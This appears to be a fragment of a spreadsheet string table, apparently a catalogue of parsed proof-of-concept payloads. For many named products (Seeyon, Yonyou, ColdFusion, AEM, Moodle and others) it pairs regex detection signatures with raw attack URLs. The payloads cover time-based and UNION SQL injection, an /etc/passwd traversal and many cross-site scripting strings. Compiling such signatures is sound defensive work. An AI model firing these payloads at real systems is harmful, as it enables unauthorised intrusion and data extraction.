    <t>/defaultroot/GovSendFileAction.do?action=listLoad&amp;editId=2|/defaultroot/GovSendFileAction.do?action=listLoad&amp;editId=2%20AND%209847%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2871%29%7C%7CCHR%28114%29%7C%7CCHR%28114%29%7C%7CCHR%2871%29%2C5%29</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/NameCardAction\.do\?action=delperson\&amp;delId=1%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27\-\-).*</t>
  </si>
  <si>
    <t>/defaultroot/NameCardAction.do?action=delperson&amp;delId=1%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/outMailLoginCheck\.jsp\?userAccount=\&amp;outMailRandom=1|/defaultroot/outMailLoginCheck\.jsp\?userAccount=\&amp;outMailRandom='%20OR%205754%3DDBMS_PIPE\.RECEIVE_MESSAGE\(CHR\(79\)%7C%7CCHR\(66\)%7C%7CCHR\(100\)%7C%7CCHR\(90\)%2C5\)%20AND%20'a'%3D'a).*</t>
  </si>
  <si>
    <t>/defaultroot/outMailLoginCheck.jsp?userAccount=&amp;outMailRandom=1|/defaultroot/outMailLoginCheck.jsp?userAccount=&amp;outMailRandom='%20OR%205754%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(79)%7C%7CCHR(66)%7C%7CCHR(100)%7C%7CCHR(90)%2C5)%20AND%20'a'%3D'a</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/WorkflowCommonAction\.do\?flag=back\&amp;curActivityId=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27\-\-).*</t>
  </si>
  <si>
    <t>/defaultroot/WorkflowCommonAction.do?flag=back&amp;curActivityId=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--</t>
  </si>
  <si>
    <t>网康</t>
  </si>
  <si>
    <t>网康_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/3g/menu\.php\?uid=1%20and%20extractvalue\(0x1,%20concat\(0x1,%20\(select%20concat\(md5\(1\)\)%20from%20Admin%20limit%201\)\)\)).*</t>
  </si>
  <si>
    <t>/3g/menu.php?uid=1%20and%20extractvalue(0x1,%20concat(0x1,%20(select%20concat(md5(1))%20from%20Admin%20limit%201)))</t>
  </si>
  <si>
    <t>微擎系统</t>
  </si>
  <si>
    <t>微擎系统_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/public/index\.php/home/index/bind_follow/\?publicid=1\&amp;is_ajax=1\&amp;uid\[0\]=exp\&amp;uid\[1\]=\)%20and%20updatexml\(1,concat\(0x7e,md5\(randomInt\(200000000,\ 210000000\)\),0x7e\),1\)\-\-\+).*</t>
  </si>
  <si>
    <t>/public/index.php/home/index/bind_follow/?publicid=1&amp;is_ajax=1&amp;uid[0]=exp&amp;uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(randomInt(200000000, 210000000)),0x7e),1)--+</t>
  </si>
  <si>
    <t>.*?(?:/api/sms_check\.php\?param=1%27%20and%20updatexml\(1,concat\(0x7e,\(SELECT%20MD5\(1234\)\),0x7e\),1\)\-\-%20).*</t>
  </si>
  <si>
    <t>/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/common/js/menu/test\.jsp\?doType=101\&amp;S1=\(SELECT%20MD5\(123\)\)).*</t>
  </si>
  <si>
    <t>/yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20MD5(123))</t>
  </si>
  <si>
    <t>.*?(?:/assetsGroupReport/assetsTestList\.jsp\?deptCode=22\&amp;key=22\&amp;unitCode=11\&amp;startDate=2012\-01\-01\&amp;endDate=2012\-02\-01%27%29%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2Csys\.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29\-\-%20\-).*</t>
  </si>
  <si>
    <t>/assetsGroupReport/assetsTestList.jsp?deptCode=22&amp;key=22&amp;unitCode=11&amp;startDate=2012-01-01&amp;endDate=2012-02-01%27%29%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29--%20-</t>
  </si>
  <si>
    <t>.*?(?:/document/file_publish_open\.jsp\?id=1%29%20AND%201387%3DDBMS_PIPE\.RECEIVE_MESSAGE%28CHR%2886%29%7C%7CCHR%2875%29%7C%7CCHR%2886%29%7C%7CCHR%28116%29%2C5%29\-\-).*</t>
  </si>
  <si>
    <t>/document/file_publish_open.jsp?id=1%29%20AND%201387%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2886%29%7C%7CCHR%2875%29%7C%7CCHR%2886%29%7C%7CCHR%28116%29%2C5%29--</t>
  </si>
  <si>
    <t>.*?(?:/sys/left\.jsp\?lx=1%27%20UNION%20ALL%20SELECT%20null%2Csys\.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull\-\-%20\-).*</t>
  </si>
  <si>
    <t>/sys/left.jsp?lx=1%27%20UNION%20ALL%20SELECT%20null%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%27123%27%29%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--%20-</t>
  </si>
  <si>
    <t>.*?(?:/mas/schedule\.jsp\?type=group\&amp;SGPID=1%27\+UNION\+ALL\+SELECT\+1,sys\.fn_varbintohexstr\(hashbytes\(%27MD5%27,%271%27\)\),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\-\-).*</t>
  </si>
  <si>
    <t>/mas/schedule.jsp?type=group&amp;SGPID=1%27+UNION+ALL+SELECT+1,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--</t>
  </si>
  <si>
    <t>.*?(?:/showphoto\.xf\?photoid=1%20AND%2076%3D69|/showphoto\.xf\?photoid=1%20AND%2076%3D76).*</t>
  </si>
  <si>
    <t>/showphoto.xf?photoid=1%20AND%2076%3D69|/showphoto.xf?photoid=1%20AND%2076%3D76|/showphoto.xf?photoid=1</t>
  </si>
  <si>
    <t>.*?(?:/u8qx/SelectDMJE\.jsp\?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27\-\-).*</t>
  </si>
  <si>
    <t>/u8qx/SelectDMJE.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27--</t>
  </si>
  <si>
    <t>.*?(?:/hrss/ref\.show\.d\?refcode=HI000000000000000003%27%29%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28%27RJDF%27%3D%27RJDF|/hrss/attach\.download\.d\?appName=PSNBASDOC_RM\&amp;pkAttach=null\&amp;Ojtt%3D8516%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema\.tables%20WHERE%202%3E1\-\-%20\.\.%2F\.\.%2F\.\.%2Fetc%2Fpasswd|/hrss/attach\.download\.d\?appName=PSNBASDOC_RM\&amp;pkAttach=null%27%20AND%206046%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28REPLACE%28REPLACE%28REPLACE%28REPLACE%28%28SELECT%20NVL%28CAST%28COUNT%28OWNER%29%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%20FROM%20%28SELECT%20DISTINCT%28OWNER%29%20FROM%20SYS\.ALL_TABLES%29%29%2CCHR%2832%29%2CCHR%28113%29%7C%7CCHR%28108%29%7C%7CCHR%28113%29%29%2CCHR%2836%29%2CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%2CCHR%2864%29%2CCHR%28113%29%7C%7CCHR%28100%29%7C%7CCHR%28113%29%29%2CCHR%2835%29%2CCHR%28113%29%7C%7CCHR%28102%29%7C%7CCHR%28113%29%29%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27GbdE%27%3D%27GbdE|/hrss/ref\.show\.d\?refcode=HI000000000000000003%27%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27FrqA%27%3D%27FrqA).*</t>
  </si>
  <si>
    <t>/hrss/ref.show.d?refcode=HI000000000000000003%27%29%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28%27RJDF%27%3D%27RJDF|/hrss/attach.download.d?appName=PSNBASDOC_RM&amp;pkAttach=null&amp;Ojtt%3D8516%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd|/hrss/attach.download.d?appName=PSNBASDOC_RM&amp;pkAttach=null%27%20AND%206046%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28REPLACE%28REPLACE%28REPLACE%28REPLACE%28%28SELECT%20NVL%28CAST%28COUNT%28OWNER%29%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%20FROM%20%28SELECT%20DISTINCT%28OWNER%29%20FROM%20SYS.ALL_TABLES%29%29%2CCHR%2832%29%2CCHR%28113%29%7C%7CCHR%28108%29%7C%7CCHR%28113%29%29%2CCHR%2836%29%2CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%2CCHR%2864%29%2CCHR%28113%29%7C%7CCHR%28100%29%7C%7CCHR%28113%29%29%2CCHR%2835%29%2CCHR%28113%29%7C%7CCHR%28102%29%7C%7CCHR%28113%29%29%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27GbdE%27%3D%27GbdE|/hrss/ref.show.d?refcode=HI000000000000000003%27%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27FrqA%27%3D%27FrqA</t>
  </si>
  <si>
    <t>.*?(?:/epp/detail/publishinfodetail\.jsp\?pk_message=1002A31000000000BS0X%27%20AND%209561%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28104%29%7C%7CCHR%28114%29%7C%7CCHR%28113%29%7C%7C%28REPLACE%28REPLACE%28REPLACE%28REPLACE%28%28SELECT%20NVL%28CAST%28USERNAME%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%20FROM%20%28SELECT%20USERNAME%2CROWNUM%20AS%20LIMIT%20FROM%20SYS\.ALL_USERS%20ORDER%20BY%201%20ASC%29%20WHERE%20LIMIT%3D34%29%2CCHR%2832%29%2CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%2CCHR%2836%29%2CCHR%28113%29%7C%7CCHR%28100%29%7C%7CCHR%28113%29%29%2CCHR%2864%29%2CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%2CCHR%2835%29%2CCHR%28113%29%7C%7CCHR%28117%29%7C%7CCHR%28113%29%29%29%7C%7CCHR%28113%29%7C%7CCHR%28105%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29\-\-%20scanf).*</t>
  </si>
  <si>
    <t>/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X%27%20AND%209561%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28104%29%7C%7CCHR%28114%29%7C%7CCHR%28113%29%7C%7C%28REPLACE%28REPLACE%28REPLACE%28REPLACE%28%28SELECT%20NVL%28CAST%28USERNAME%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%20FROM%20%28SELECT%20USERNAME%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS%20ORDER%20BY%201%20ASC%29%20WHERE%20LIMIT%3D34%29%2CCHR%2832%29%2CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29%2CCHR%2836%29%2CCHR%28113%29%7C%7CCHR%28100%29%7C%7CCHR%28113%29%29%2CCHR%2864%29%2CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%2CCHR%2835%29%2CCHR%28113%29%7C%7CCHR%28117%29%7C%7CCHR%28113%29%29%29%7C%7CCHR%28113%29%7C%7CCHR%28105%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20scanf</t>
  </si>
  <si>
    <t>.*?(?:/login/forgetpswd\.php\?ClearS=1\&amp;loginname=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27\-\-).*</t>
  </si>
  <si>
    <t>/login/forgetpswd.php?ClearS=1&amp;loginname=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--</t>
  </si>
  <si>
    <t>.*?(?:/servlet/\~uap/nc\.bs\.sm\.login2\.RegisterServlet\?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL\-\-%20Jptd).*</t>
  </si>
  <si>
    <t>/servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL--%20Jptd</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/common/js/menu/test\.jsp\?doType=101\&amp;S1=\(SELECT%20md5\(randomInt\(200000000,\ 220000000\)\)\)).*</t>
  </si>
  <si>
    <t>/yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20md5(randomInt(200000000, 220000000)))</t>
  </si>
  <si>
    <t>.*?(?:/\?/member/cart/Fastpay\&amp;shopid=\-1%20union%20select%20md5\(randomInt\(2000000000,\ 2100000000\)\),2,3,4%20\-\-\+).*</t>
  </si>
  <si>
    <t>/?/member/cart/Fastpay&amp;shopid=-1%20union%20select%20md5(randomInt(2000000000, 2100000000)),2,3,4%20--+</t>
  </si>
  <si>
    <t>.*?(?:/mainpage/msglog\.aspx\?user=1%27).*</t>
  </si>
  <si>
    <t>/mainpage/msglog.aspx?user=1%27</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/ext/trafaxserver/ExtnoManage/setextno\.jsp\?user_ids=\(17\)\ union\ all\ select\ 1,2,md5\(123456\),4\#).*</t>
  </si>
  <si>
    <t>/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,md5(123456),4#</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/ext/trafaxserver/ExtnoManage/setextno\.jsp\?user_ids=\(99999\)\ union\ all\ select\ 1,2,\(md5\(123\)\),4\#).*</t>
  </si>
  <si>
    <t>/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(123)),4#</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/common/js/menu/test\.jsp\?doType=101\&amp;S1=\(SELECT%20md5\(123456\)\)|/yyoa/common/js/menu/test\.jsp;1\.js\?doType=101\&amp;S1=\(SELECT%20md5\(123456\)\)).*</t>
  </si>
  <si>
    <t>/yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20md5(123456))|/yyoa/common/js/menu/test.jsp;1.js?doType=101&amp;S1=(SELECT%20md5(123456))</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/common/js/menu/test\.jsp\?doType=101\&amp;S1=\(SELECT%20md5\(randomInt\(200000000,\ 210000000\)\)\)).*</t>
  </si>
  <si>
    <t>/yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20md5(randomInt(200000000, 210000000)))</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/ext/trafaxserver/ExtnoManage/setextno\.jsp\?user_ids=\(17\)%20union%20all%20select%201,2,@@version,md5\(randomInt\(200000000,\ 210000000\)\)%23).*</t>
  </si>
  <si>
    <t>/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5(randomInt(200000000, 210000000))%23</t>
  </si>
  <si>
    <t>.*?(?:/yyoa/ext/trafaxserver/downloadAtt\.jsp\?attach_ids=\(1\)%20and%201=2%20union%20select%201,2,3,4,5,md5\(randomInt\(200000000,\ 210000000\)\),7\-\-).*</t>
  </si>
  <si>
    <t>/yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5(randomInt(200000000, 210000000)),7--</t>
  </si>
  <si>
    <t>智邦</t>
  </si>
  <si>
    <t>智邦_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/SYSN/json/pcclient/GetPersonalSealData\.ashx\?imageDate=1\&amp;userId=\-1%20union%20select%201\-\-).*</t>
  </si>
  <si>
    <t>/SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&amp;userId=-1%20union%20select%201--</t>
  </si>
  <si>
    <t>Acme</t>
  </si>
  <si>
    <t>Acme_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/\.well\-known/acme\-challenge/%3C%3fxml%20version=%221\.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www\.w3\.org/1999/xhtml%22%3Ealert%28document\.domain%26%23x29%3B%3C/x:script%3E).*</t>
  </si>
  <si>
    <t>/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E</t>
  </si>
  <si>
    <t>xss_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Adobe</t>
  </si>
  <si>
    <t>Adobe_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/CFIDE/debug/cf_debugFr\.cfm\?userPage=javascript:alert\(1\)|/cfusion/debug/cf_debugFr\.cfm\?userPage=javascript:alert\(1\)).*</t>
  </si>
  <si>
    <t>/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)|/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)</t>
  </si>
  <si>
    <t>Aem</t>
  </si>
  <si>
    <t>Aem_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/content/crx/de/setPreferences\.jsp;%0A\.html\?language=en\&amp;keymap=&lt;svg/onload=confirm\(document\.domain\);&gt;//a|/crx/de/setPreferences\.jsp;%0A\.html\?language=en\&amp;keymap=&lt;svg/onload=confirm\(document\.domain\);&gt;//a).*</t>
  </si>
  <si>
    <t>/content/crx/de/setPreferences.jsp;%0A.html?language=en&amp;keymap=&lt;svg/onload=confirm(document.domain);&gt;//a|/crx/de/setPreferences.jsp;%0A.html?language=en&amp;keymap=&lt;svg/onload=confirm(document.domain);&gt;//a</t>
  </si>
  <si>
    <t>adobe_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>AikCMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/admin/page/union/ad_edit\.php\?id=5%20and%20if\(1,sleep\(3\),1\)|/index\.php\?mode=search\&amp;wd=&lt;/title&gt;&lt;svg/onload=alert\(1\)&gt;).*</t>
  </si>
  <si>
    <t>/admin/page/union/ad_edit.php?id=5%20and%20if(1,sleep(3),1)|/index.php?mode=search&amp;wd=&lt;/title&gt;&lt;svg/onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>Bitrix</t>
  </si>
  <si>
    <t>Bitrix_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/bitrix/help/en/index\.html\?page=javascript:alert\('\{\{randstr\}\}'\)).*</t>
  </si>
  <si>
    <t>/bitrix/help/en/index.html?page=javascript:alert('{{randstr}}')</t>
  </si>
  <si>
    <t>BlackbOArd</t>
  </si>
  <si>
    <t>BlackbOArd_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/main/blank\?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert\(8675309\)%3E|/main/blank\?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert\(8675309\)%3E).*</t>
  </si>
  <si>
    <t>/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E|/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E</t>
  </si>
  <si>
    <t>Btoptionscom</t>
  </si>
  <si>
    <t>Btoptionscom_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/financial_times\.php\?issue=%3Cscript%3Ealert\(%27xss%27\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/financial_times.php?issue=%3Cscript%3Ealert(%27xss%27)%3C/script%3E</t>
  </si>
  <si>
    <t>Chamilo</t>
  </si>
  <si>
    <t>Chamilo_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/main/calendar/agenda_list\.php\?type=xss"\+onmouseover=alert\(document\.domain\)\+").*</t>
  </si>
  <si>
    <t>/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"</t>
  </si>
  <si>
    <t>Concrete</t>
  </si>
  <si>
    <t>Concrete_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/ccm/system/panels/page/preview_as_user/preview\?cID="&gt;&lt;/iframe&gt;&lt;svg/onload=alert\(1\)&gt;).*</t>
  </si>
  <si>
    <t>/ccm/system/panels/page/preview_as_user/preview?cID="&gt;&lt;/iframe&gt;&lt;svg/onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>织梦_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/include/dialog/config\.php\?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Discourse</t>
  </si>
  <si>
    <t>Discourse_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/email/unsubscribed\?email=test@gmail\.com%27\\"&gt;&lt;svg/onload=alert\(1337\)&gt;).*</t>
  </si>
  <si>
    <t>/email/unsubscribed?email=test@gmail.com%27\"&gt;&lt;svg/onload=alert(1337)&gt;</t>
  </si>
  <si>
    <t>Eclipse</t>
  </si>
  <si>
    <t>Eclipse_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/help/index\.jsp\?view=&lt;script&gt;alert\(document\.cookie\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/help/index.jsp?view=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>EmpireCMS</t>
  </si>
  <si>
    <t>EmpireCMS_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/e/ViewImg/index\.html\?url=javascript:alert\(document\.domain\)).*</t>
  </si>
  <si>
    <t>/e/ViewImg/index.html?url=javascript:alert(document.domain)</t>
  </si>
  <si>
    <t>Javamelody</t>
  </si>
  <si>
    <t>Javamelody_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/monitoring\?part=graph\&amp;graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/monitoring?part=graph&amp;graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Joomla_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_googlesearch_cse\&amp;n=30\&amp;Itemid=\&amp;cx=017093687396734519753%3Ao_92rwvgxxw\&amp;cof=FORID%3A9\&amp;ie=ISO\-8859\-1\&amp;q=%22%3E%3Cimg\+src%3Dx\+onerror%3Dalert\('0x2334171512353333&gt;'\)%3E\&amp;sa=Search\&amp;hl=en).*</t>
  </si>
  <si>
    <t>/index.php?option=com_googlesearch_cse&amp;n=30&amp;Itemid=&amp;cx=017093687396734519753%3Ao_92rwvgxxw&amp;cof=FORID%3A9&amp;ie=ISO-8859-1&amp;q=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('0x2334171512353333&gt;')%3E&amp;sa=Search&amp;hl=en</t>
  </si>
  <si>
    <t>Kafdrop</t>
  </si>
  <si>
    <t>Kafdrop_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert\(2\)%3E).*</t>
  </si>
  <si>
    <t>/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E</t>
  </si>
  <si>
    <t>Laravel_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/_ignition/scripts/\-\-&gt;&lt;svg%20onload=alert\(1337\)&gt;).*</t>
  </si>
  <si>
    <t>/_ignition/scripts/--&gt;&lt;svg%20onload=alert(1337)&gt;</t>
  </si>
  <si>
    <t>laravel_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Lucee</t>
  </si>
  <si>
    <t>Lucee_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/lucees3ezf%3cimg%20src%3da%20onerror%3dalert\('\{\{randstr\}\}'\)%3elujb7/admin/imgProcess\.cfm|/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert\('\{\{randstr\}\}'\)%3elujb7/admin/imgProcess\.cfm).*</t>
  </si>
  <si>
    <t>/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm|/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm</t>
  </si>
  <si>
    <t>Microweber_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/editor_tools/module\?type=files/admin"&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;\&amp;params=filetype=images\#path=).*</t>
  </si>
  <si>
    <t>/editor_tools/module?type=files/admin"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;params=filetype=images#path=</t>
  </si>
  <si>
    <t>Moodle</t>
  </si>
  <si>
    <t>Moodle_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/mod/jitsi/sessionpriv\.php\?avatar=https%3A%2F%2Ftargetdomain\.com%2Fuser%2Fpix\.php%2F498%2Ff1\.jpg\&amp;nom=test_user%27\)%3balert\(document\.domain\)%3b//\&amp;ses=test_user\&amp;t=1|/mod/jitsi/sessionpriv\.php\?avatar=https%3A%2F%2F\{\{Hostname\}\}%2Fuser%2Fpix\.php%2F498%2Ff1\.jpg\&amp;nom=test_user%27\)%3balert\(document\.domain\)%3b//\&amp;ses=test_user\&amp;t=1).*</t>
  </si>
  <si>
    <t>/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&amp;nom=test_user%27)%3balert(document.domain)%3b//&amp;ses=test_user&amp;t=1|/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&amp;nom=test_user%27)%3balert(document.domain)%3b//&amp;ses=test_user&amp;t=1</t>
  </si>
  <si>
    <t>.*?(?:/mod/lti/auth\.php\?redirect_uri=javascript:alert\('\{\{randstr\}\}'\)).*</t>
  </si>
  <si>
    <t>/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')</t>
  </si>
  <si>
    <t>.*?(?:/filter/jmol/js/jsmol/php/jsmol\.php\?call=saveFile\&amp;data=%3Cscript%3Ealert\(%27XSS%27\)%3C/script%3E\&amp;mimetype=text/html|/filter/jmol/iframe\.php\?_USE=%22\};alert\(1337\);//).*</t>
  </si>
  <si>
    <t>/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&amp;data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&amp;mimetype=text/html|/filter/jmol/iframe.php?_USE=%22};alert(1337);//</t>
  </si>
  <si>
    <t>Nscript</t>
  </si>
  <si>
    <t>Nscript_跨站脚本</t>
  </si>
  <si>
    <t>.*?(?:/bollywood\.php\?s="&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;|/products\-listing\.php\?s="&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/bollywood.php?s="&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;|/products-listing.php?s="&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Oracle</t>
  </si>
  <si>
    <t>Oracle_跨站脚本</t>
  </si>
  <si>
